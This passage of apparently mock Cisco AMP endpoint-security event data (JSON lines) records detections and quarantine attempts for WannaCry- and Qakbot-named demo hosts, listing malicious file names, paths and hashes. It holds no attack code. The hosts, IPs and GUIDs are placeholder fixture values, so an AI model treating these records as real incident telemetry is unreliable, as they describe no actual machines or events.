Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":975000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3060,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":897000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":796,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":850000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":726000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":694000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":585000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":554000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":460000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 